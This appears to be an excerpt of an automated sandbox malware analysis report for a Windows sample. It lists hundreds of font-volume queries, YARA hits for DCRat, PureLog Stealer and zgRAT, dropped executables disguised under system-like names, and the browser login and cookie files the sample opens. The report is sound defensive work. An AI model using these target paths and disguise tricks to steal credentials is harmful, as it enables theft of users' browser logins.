                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeQueries volume information: C:\Windows\LiveKernelReports\UserOOBEBroker.exe VolumeInformation
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeQueries volume information: C:\Users\user\Desktop\U1jaLbTw1f.exe VolumeInformation
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeQueries volume information: C:\Users\user\Desktop\U1jaLbTw1f.exe VolumeInformation
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeQueries volume information: C:\Windows\LiveKernelReports\UserOOBEBroker.exe VolumeInformation
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeQueries volume information: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe VolumeInformation
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeQueries volume information: C:\Windows\LiveKernelReports\UserOOBEBroker.exe VolumeInformation
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Stealing of Sensitive Information

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000016.00000002.4116310590.0000000002FB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000016.00000002.4116310590.000000000346C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000016.00000002.4116310590.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1687007054.000000001342A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: U1jaLbTw1f.exe PID: 7584, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: mGDcgYSpPaqkzVyIrStmzarQirIs.exe PID: 8052, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 8128, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: U1jaLbTw1f.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.U1jaLbTw1f.exe.d80000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1642273712.0000000000D82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\LiveKernelReports\UserOOBEBroker.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: U1jaLbTw1f.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.U1jaLbTw1f.exe.d80000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\LiveKernelReports\UserOOBEBroker.exe, type: DROPPED
                              Tries to harvest and steal browser information (history, passwords, etc)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
